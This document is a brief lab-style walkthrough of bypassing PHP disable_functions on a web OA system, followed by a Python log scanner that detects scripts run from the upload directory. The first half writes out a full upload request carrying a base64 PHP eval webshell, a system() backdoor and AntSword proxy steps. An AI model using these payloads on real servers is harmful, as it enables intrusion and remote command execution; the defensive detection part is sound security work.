Bypass Disable_functions

1. Bypass disable_functions

POST /uploadbase64.php HTTP/1.1
Host: 172.28.23.26
Cookie: id=1; loginname=admin; jueseid=1; danweiid=1; quanxian=admin
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
Connection: close

imgbase64=data:image/php;base64,PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==

HTTP/1.1 200 OK
Date: Wed, 21 Jan 2026 06:42:50 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 45
Connection: close
Content-Type: text/html; charset=UTF-8

{"src":"upload/2026-01-21-6970756a83fcf.php"}

Upload the webshell, then connect to it with AntSword.

After clicking Start, a .antproxy.php file is uploaded. Create a new shell.php in the same directory:

#/var/www/html/OAsystem/upload/shell.php
<?php system($_GET['cmd']);?>


Edit .antproxy.php so that its url points to this shell.php.

At this point, requesting .antproxy.php is equivalent to requesting shell.php.

GET http://172.28.23.26/upload/.antproxy.php?cmd=whoami HTTP/1.1
Host: 172.28.23.26
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: id=1; loginname=admin; jueseid=1; danweiid=1; quanxian=admin
Connection: close

This is a backdoor driven by GET requests,
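
A defender-side check for the traces this walkthrough leaves in the web server log, as an added example that is not part of the original notes: it flags requests that run scripts out of the upload directory. The Apache combined log format, the `/upload/` path constant, the client IP and the timestamps are assumptions; the sample lines are constructed from the requests shown above.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache "combined" log line: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Extensions a stock Apache/PHP setup may hand to the PHP interpreter.
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phar)$', re.I)
UPLOAD_DIR = "/upload/"  # assumption: web path of the upload directory

def classify(line):
    """Return the reasons a log line looks like script execution from the upload dir."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m["target"])      # also handles absolute-form request targets
    path = unquote(url.path)         # decode %2e-style encodings before matching
    if UPLOAD_DIR not in path or not SCRIPT_EXT.search(path):
        return []
    reasons = ["script-in-upload-dir"]
    if path.rsplit("/", 1)[-1].startswith("."):
        reasons.append("hidden-script")          # dotfile such as .antproxy.php
    if m["method"] == "GET" and parse_qs(url.query):
        reasons.append("get-params-to-uploaded-script")
    return reasons

def scan(lines):
    """Return (client_ip, request_target, reasons) for every flagged line."""
    hits = []
    for line in lines:
        reasons = classify(line)
        if reasons:
            m = LOG_RE.match(line)
            hits.append((m["ip"], m["target"], reasons))
    return hits

# Constructed sample log lines (client IP and timestamps are made up).
SAMPLE = [
    '172.28.23.9 - - [21/Jan/2026:06:42:50 +0000] "POST /uploadbase64.php HTTP/1.1" 200 45 "-" "-"',
    '172.28.23.9 - - [21/Jan/2026:06:44:02 +0000] "POST /upload/2026-01-21-6970756a83fcf.php HTTP/1.1" 200 120 "-" "-"',
    '172.28.23.9 - - [21/Jan/2026:06:57:25 +0000] "GET http://172.28.23.26/upload/.antproxy.php?cmd=whoami HTTP/1.1" 200 9 "-" "-"',
    '172.28.23.9 - - [21/Jan/2026:07:01:00 +0000] "GET /upload/2026-01-20-avatar.png HTTP/1.1" 200 5120 "-" "-"',
]

if __name__ == "__main__":
    for ip, target, reasons in scan(SAMPLE):
        print(ip, target, ",".join(reasons))
```

Any hit means the server executed a file from a directory that should only serve static content, so the upload directory's script handling and the upload endpoint's extension logic are the places to fix.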